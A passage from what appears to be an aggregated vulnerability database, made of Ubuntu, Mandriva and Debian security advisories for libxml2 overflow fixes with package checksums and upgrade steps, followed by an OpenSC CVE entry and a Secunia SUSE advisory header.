b1c42f5d79806ca0ddb842d6e46589e4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 807300 2ec0838cfed794ad0dfba8e6c2f8f5a6 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 795578 5177c5c668b1cb6ab972a42ba74ce69b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 275720 848f0e32688509c20e716bf56854b3c2 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.diff.gz Size/MD5: 86115 e8ae94cf06df5aa69bcb4e9e3478dc3a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.dsc Size/MD5: 1494 59db95aea21b88b40de41b4eb6286204 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz Size/MD5: 3425843 bb11c95674e775b791dab2d15e630fa4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5ubuntu4.2_all.deb Size/MD5: 1309904 8a177134aefda1c1803ee8cea7876987 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 1014666 7eecb75acf8cfe96f0d8ad00dc6cd0f7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 777666 303a6a64d87e0666177f9ee63cf1a03c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_amd64.udeb Size/MD5: 607592 f0abee0ba9c7cac159aa282ff04b968d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 37356 e60cf6a423c951786da162ffe21132a1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 864536 fd1367706366bfd805f692c39f331835 
http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 863456 0e646ecc8d3e8e72fc65739a4bae3de9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 359004 6541b0c12852c3e490ddb20c06448eae i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 967152 3bc76bac8a99f2bceca5169cf9394f2c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 701712 b3aa303a9b2fcdcbdcb62595a6876f86 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_i386.udeb Size/MD5: 563692 fbda90721b32837d401f72def5bae5d4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 33904 a3323cb518af641c59ea45369a65746f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 820722 d26fe8acb0a5aee307d06edae3e7e28a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 785386 afdcafaa8bac5e88aa4a13e0d749b2ea http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 324412 bae919ee044ef9aaf19656b9d1976b19 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 994408 53e4d8355d376154e295df19d3a3c60d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 697522 5222a56651f77e522ca0ad1c6d6d5de6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_lpia.udeb Size/MD5: 553434 48f46f951b7ebc278e84ad661d306f19 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_lpia.deb 
Size/MD5: 34098 60966a769f8d75d8bc8253c687e38244 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 810434 585824abaa30b7726f8e7beeae6150eb http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 778354 6588b53390d8a294fc18ab6624e6c7c1 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 320608 cb34801b64a53678cc553625fec3feaf powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 985248 ecf8b6d8401aebd949116cb0169a96fe http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 793242 1fc757dad96c16d285df20a5137af4c6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_powerpc.udeb Size/MD5: 582210 87a282cc9ab3bf5af1015ce0624d01d9 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 40434 3e24add8c4c0aaf0b7931dd185394d6d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 839218 0b75a09404be80b49058058c2aa6e746 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 825710 58709b2af622ff835b15f799cd47fcfe http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 344720 c07c4729d2191cf51d85654a83e8faf2 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 872512 b6f95a836cabc34e1266b76cc250a9e0 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 730870 607909857dea94afe8102a7131595252 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_sparc.udeb Size/MD5: 551000 
7fbe08e3223c9543645eadb4b9e0167a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 36486 c3540c5aadb1adc3f85f6276a1980d0c http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 807954 a3ac3191b768e4b6e1e7b1c279b26a13 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 798558 dd9c4b6bf81302a938f71ed0f9cf47c8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 338152 674bae887b0ae673dd4732498c5a738c . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:192 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libxml2 Date : September 11, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A heap-based buffer overflow was found in how libxml2 handled long XML entity names. The updated packages have been patched to prevent this issue. As well, the patch to fix CVE-2008-3281 has been updated to remove the hard-coded entity limit that was set to 5M, instead using XML entity density heuristics. Many thanks to Daniel Veillard of Red Hat for his hard work in tracking down and dealing with the edge cases discovered with the initial fix to this issue. 
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.1:
9250adec77a5118119d5000f2305540f  2007.1/i586/libxml2-2.6.27-3.4mdv2007.1.i586.rpm
103dba08606f0038f3a9f4107ceba442  2007.1/i586/libxml2-devel-2.6.27-3.4mdv2007.1.i586.rpm
a388bf596ef6725fb5baadb4e056a0bd  2007.1/i586/libxml2-python-2.6.27-3.4mdv2007.1.i586.rpm
d2333e42a538101e36eab7d12467e08b  2007.1/i586/libxml2-utils-2.6.27-3.4mdv2007.1.i586.rpm
94a25c63f54693b7ac289223a6a3a687  2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64:
343f8656039b69716fe712eeb2d1bf4e  2007.1/x86_64/lib64xml2-2.6.27-3.4mdv2007.1.x86_64.rpm
320d8dd8245f5ec6db46bedaf07afb3e  2007.1/x86_64/lib64xml2-devel-2.6.27-3.4mdv2007.1.x86_64.rpm
fb6f52df6831cda42db46502cc761475  2007.1/x86_64/lib64xml2-python-2.6.27-3.4mdv2007.1.x86_64.rpm
8440fc08fee99f18a81a32035fac166a  2007.1/x86_64/libxml2-utils-2.6.27-3.4mdv2007.1.x86_64.rpm
94a25c63f54693b7ac289223a6a3a687  2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm

Mandriva Linux 2008.0:
c53b40d9c7ebec036f9175c8f4e87b3b  2008.0/i586/libxml2_2-2.6.30-1.4mdv2008.0.i586.rpm
4a4ed97086b52cab3bbd34fe4d7003a0  2008.0/i586/libxml2-devel-2.6.30-1.4mdv2008.0.i586.rpm
d3898465dc2797a2b20be8310dd4f484  2008.0/i586/libxml2-python-2.6.30-1.4mdv2008.0.i586.rpm
34c524fa03b470093bd0b0c679bcb9c4  2008.0/i586/libxml2-utils-2.6.30-1.4mdv2008.0.i586.rpm
2dc2f4732992e27aea4c5a098c631ae8  2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
20ac98b346a1f18b90504cb623c530d8  2008.0/x86_64/lib64xml2_2-2.6.30-1.4mdv2008.0.x86_64.rpm
fd5907e801bf4f64ee79d097fcaec2b6  2008.0/x86_64/lib64xml2-devel-2.6.30-1.4mdv2008.0.x86_64.rpm
20f45401e501b9639a9b53d82a4e031f  2008.0/x86_64/libxml2-python-2.6.30-1.4mdv2008.0.x86_64.rpm
22be20e194ba2177a47d831ee8c82f47  2008.0/x86_64/libxml2-utils-2.6.30-1.4mdv2008.0.x86_64.rpm
2dc2f4732992e27aea4c5a098c631ae8  2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm

Mandriva Linux 2008.1:
61e96824adc6e61b2764bb3a85e2e76d  2008.1/i586/libxml2_2-2.6.31-1.3mdv2008.1.i586.rpm
6d0cc51d32c7b6ecd609250aad302034  2008.1/i586/libxml2-devel-2.6.31-1.3mdv2008.1.i586.rpm
1e7c4ddd30677789de05cc464dde9790  2008.1/i586/libxml2-python-2.6.31-1.3mdv2008.1.i586.rpm
edd477e34b08f94956eeedd387b5e509  2008.1/i586/libxml2-utils-2.6.31-1.3mdv2008.1.i586.rpm
b1078a83185c1c97fada7ea5e97df753  2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
9d25e809ad31decb111a38301b2a74c1  2008.1/x86_64/lib64xml2_2-2.6.31-1.3mdv2008.1.x86_64.rpm
f35af82dffc02628edb1ce03113c3ba0  2008.1/x86_64/lib64xml2-devel-2.6.31-1.3mdv2008.1.x86_64.rpm
5819b393de9ff05be4d670c8e5d36080  2008.1/x86_64/libxml2-python-2.6.31-1.3mdv2008.1.x86_64.rpm
fb670bfb1a1673f99f3c3fc3a72b7777  2008.1/x86_64/libxml2-utils-2.6.31-1.3mdv2008.1.x86_64.rpm
b1078a83185c1c97fada7ea5e97df753  2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm

Corporate 3.0:
82e733037c09b4b7770f5325c7ed1325  corporate/3.0/i586/libxml2-2.6.6-1.5.C30mdk.i586.rpm
d66da7916f188883fd164cb250431bba  corporate/3.0/i586/libxml2-devel-2.6.6-1.5.C30mdk.i586.rpm
5df28181424b19132bbff6afa872475a  corporate/3.0/i586/libxml2-python-2.6.6-1.5.C30mdk.i586.rpm
f7a86c3be6e4926fa101386a9cbbcbdd  corporate/3.0/i586/libxml2-utils-2.6.6-1.5.C30mdk.i586.rpm
c64826e1b31ed0c5d4514780ecd52e2e  corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm

Corporate 3.0/X86_64:
76e631bd88c68085dc2c5702235c2a99  corporate/3.0/x86_64/lib64xml2-2.6.6-1.5.C30mdk.x86_64.rpm
827f9f5bc3a1b869353e3c09879ea432  corporate/3.0/x86_64/lib64xml2-devel-2.6.6-1.5.C30mdk.x86_64.rpm
caafa3371f80f084e8a945b3114b4533  corporate/3.0/x86_64/lib64xml2-python-2.6.6-1.5.C30mdk.x86_64.rpm
e37a70f9cd13a7e00982387a9ba97726  corporate/3.0/x86_64/libxml2-utils-2.6.6-1.5.C30mdk.x86_64.rpm
c64826e1b31ed0c5d4514780ecd52e2e  corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm

Corporate 4.0:
74eea161b5519eef6c16b2407126a847  corporate/4.0/i586/libxml2-2.6.21-3.4.20060mlcs4.i586.rpm
5d8d1e0e487022687c1c61fbaf91707e  corporate/4.0/i586/libxml2-devel-2.6.21-3.4.20060mlcs4.i586.rpm
d5aa677468c9e8baae074a12f6c63c00  corporate/4.0/i586/libxml2-python-2.6.21-3.4.20060mlcs4.i586.rpm
d51b4b902bb911be69f6a17aeb07d8cf  corporate/4.0/i586/libxml2-utils-2.6.21-3.4.20060mlcs4.i586.rpm
ce28651304236296e59d6d3be5525889  corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
812f2ae0ffa7a72546b07bd7de174453  corporate/4.0/x86_64/lib64xml2-2.6.21-3.4.20060mlcs4.x86_64.rpm
23ae06098f957e46affa75220cac50af  corporate/4.0/x86_64/lib64xml2-devel-2.6.21-3.4.20060mlcs4.x86_64.rpm
93cb252dadfadd4249062f903e604f82  corporate/4.0/x86_64/lib64xml2-python-2.6.21-3.4.20060mlcs4.x86_64.rpm
aeff512a1b349108017e93633fabcf08  corporate/4.0/x86_64/libxml2-utils-2.6.21-3.4.20060mlcs4.x86_64.rpm
ce28651304236296e59d6d3be5525889  corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIyaCLmqjQ0CJFipgRApioAJ9P7O5hzNQ4UuYvEIhTVLyyn9Tv9wCg4DSp
mZuI5mJOfDomJXN1l5E7NSw=
=tPwM
-----END PGP SIGNATURE-----

This could allow the execution of arbitrary code via a malicious XML file.

For the stable distribution (etch), this problem has been fixed in version 2.6.27.dfsg-5.

For the unstable distribution (sid), this problem has been fixed in version 2.6.32.dfsg-4.

We recommend that you upgrade your libxml2 package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz  Size/MD5 checksum: 220443 48cafbb8d1bd2c6093339fea3f14e4a0
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz  Size/MD5 checksum: 3416175 5ff71b22f6253a6dd9afc1c34778dec3
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc  Size/MD5 checksum: 893 0dc1f183dd20741e5b4e26a7f8e1c652

Architecture independent packages:
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb  Size/MD5 checksum: 1328144 c1c5f0ceb391893a94e61c074b677ee9

alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb  Size/MD5 checksum: 820850 fac5556241bb0fde20913f25fb9c73ac
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb  Size/MD5 checksum: 37980 725b1c6925e610b5843ba0ad554dc7bc
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb  Size/MD5 checksum: 184754 5ccbaf07b44dcfe528167074050bf270
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb  Size/MD5 checksum: 916830 17d71480b7e2a447dabde99c11d752fa
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb  Size/MD5 checksum: 881834 cac19a28b37f7afb9e07966f44ddd5b2

amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb  Size/MD5 checksum: 184130 a13372752d162d0fb2ccd58da6b73e20
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb  Size/MD5 checksum: 36684 8a0265229bebf9245dc7bb7cc6f41d36
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb  Size/MD5 checksum: 796194 6019e59020269cca8fa8fea40f83c118
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb  Size/MD5 checksum: 891922 606fc28448bead2709c39a1d3e529a25
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb  Size/MD5 checksum: 745758 95bd39eb2818772c43c3351b22326fcd

arm architecture (ARM)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb  Size/MD5 checksum: 741876 1b670c6bac3aa9f7df28f7ea3f1e5725
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb  Size/MD5 checksum: 34678 9a992dc251b137a919a813eed2af8489
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb  Size/MD5 checksum: 165290 732b4e94b91a086c6b950d187af160bc
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb  Size/MD5 checksum: 817514 299c93a812ac02a8aa9da88f4cb5aedf
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb  Size/MD5 checksum: 673192 d2ff2c26ee8dae05f81c24aa6dfce9b5

hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb  Size/MD5 checksum: 191876 4d2e33090237b47bc10e9526329f0bc5
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_hppa.deb  Size/MD5 checksum: 36708 0ebf8554c5a0e873b128d52ceafccdfd
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_hppa.deb  Size/MD5 checksum: 850210 bde343770ac9a7bd458e68a60c2b8434
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_hppa.deb  Size/MD5 checksum: 858660 88f67d0d2aff41333ca2f4d4b2d6b5b2
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_hppa.deb  Size/MD5 checksum: 864474 489dbd9d677c274c07abb88d0f23b969

i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_i386.deb  Size/MD5 checksum: 755986 9fdf341ede17d7790202229db9cc1353
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_i386.deb  Size/MD5 checksum: 169032 272c6be290817bf9cb8b401425fd83d5
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_i386.deb  Size/MD5 checksum: 681472 d8a0611d638e0553da64a218fbcf291a
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_i386.deb  Size/MD5 checksum: 857318 6946048170dd7d142c03c13794c30d6f
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_i386.deb  Size/MD5 checksum: 34496 3e3674a714f780024630ad1a2ca46eab

ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_ia64.deb  Size/MD5 checksum: 1106480 03e08564e2bf843905daecdd7c5cc4c4
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_ia64.deb  Size/MD5 checksum: 874222 ed9ab6fa068a5b07c22ec1c10db8e0ab
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_ia64.deb  Size/MD5 checksum: 1080186 defc5f4f9eb80872a793cc025e33a111
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_ia64.deb  Size/MD5 checksum: 48492 5a567323dc0bf8159a6eae87957266d5
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_ia64.deb  Size/MD5 checksum: 196536 cdbb137c8bb31cf29114673c4cb28e67

mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mips.deb  Size/MD5 checksum: 34418 4a05346cb2fc6c314e7e8aef21662469
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mips.deb  Size/MD5 checksum: 171678 c94bfffc6bde639623ce9a91028960e5
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mips.deb  Size/MD5 checksum: 926922 ddc8ff03120dd78869830d38a5e8708d
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mips.deb  Size/MD5 checksum: 840642 57f2ea24a31904c4b07531f6292a4a8e
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mips.deb  Size/MD5 checksum: 770246 20ba2586e1406d66bd34642f13265dcf

mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mipsel.deb  Size/MD5 checksum: 34398 9f0ebfb1dc37496e6b7a4e9963ffaeff
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mipsel.deb  Size/MD5 checksum: 898346 29680d5d5baa66e251e71f55aa128e3c
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mipsel.deb  Size/MD5 checksum: 768976 8f6464a0ef61b3ddcd271652a01c7469
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mipsel.deb  Size/MD5 checksum: 833252 5c83c05d44526479e7c550fd0d8cbdbe
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mipsel.deb  Size/MD5 checksum: 168690 eb56cb1ea49795d0a5a18af468625941

powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_powerpc.deb  Size/MD5 checksum: 898010 c3d61392afcb383d0f27d5f91fda721d
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_powerpc.deb  Size/MD5 checksum: 770994 94ef895f8942b880e8823e10420120e6
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_powerpc.deb  Size/MD5 checksum: 172726 5d097f0290be2bab9b93287bad07e83f
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_powerpc.deb  Size/MD5 checksum: 37660 e977bc38e837077de7a006ef923b98bd
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_powerpc.deb  Size/MD5 checksum: 779958 ad7245f8a9980d7f40234aefaf12a31b

s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_s390.deb  Size/MD5 checksum: 185726 91661276ed6cf371373b4e61805c81b8
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_s390.deb  Size/MD5 checksum: 885618 218f2603ab94bf92ba45cd330fe15782
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_s390.deb  Size/MD5 checksum: 806024 3abe21a0d756e5a0a2ca646f0ba32729
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_s390.deb  Size/MD5 checksum: 36378 cbc5eb7e2f81adafeba8e857aee8c918
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_s390.deb  Size/MD5 checksum: 750190 4172cb95d7aea2f9ee9331220cd5274c

sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_sparc.deb  Size/MD5 checksum: 781522 c20ea9c8ab0ec798488e68c845650036
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_sparc.deb  Size/MD5 checksum: 713144 e0139b86fbf9644678c2c6de6462bff1
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_sparc.deb  Size/MD5 checksum: 759568 7d46f7ceb214711851cc1f27edef2c48
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_sparc.deb  Size/MD5 checksum: 34580 fceb65808b2c98f621d79352eea9d2d5
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_sparc.deb  Size/MD5 checksum: 176874 f27821fe07861f2e71658bc3eb0a595e

These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD4DBQFI9N2RwM/Gs81MDZ0RAqP7AJYxbWnJqF4zauFOietE80FTYW02AKDCOBt2
wvZ3MJ4FZeRn990jpLrh1A==
=FZQi
-----END PGP SIGNATURE-----
VAR-200809-0570 CVE-2008-3972 OpenSC pkcs15-tool does not apply security updates to cards whose label is not "OpenSC" CVSS V2: 6.6
CVSS V3: -
Severity: MEDIUM
pkcs15-tool in OpenSC before 0.11.6 does not apply security updates to a smart card unless the card's label matches the "OpenSC" string, which might allow physically proximate attackers to exploit vulnerabilities that the card owner expected were patched, as demonstrated by exploitation of CVE-2008-2235. OpenSC is prone to a local security vulnerability. OpenSC is a smart card program and application library.
----------------------------------------------------------------------
TITLE: SUSE Update for Multiple Packages
SECUNIA ADVISORY ID: SA32099
VERIFY ADVISORY: http://secunia.com/advisories/32099/
CRITICAL: Highly critical
IMPACT: Security Bypass, Exposure of sensitive information, Privilege escalation, DoS, System access
WHERE: From remote
OPERATING SYSTEM:
SUSE Linux Enterprise Server 9 http://secunia.com/advisories/product/4118/
SUSE Linux Enterprise Server 10 http://secunia.com/advisories/product/12192/
openSUSE 11.0 http://secunia.com/advisories/product/19180/
openSUSE 10.3 http://secunia.com/advisories/product/16124/
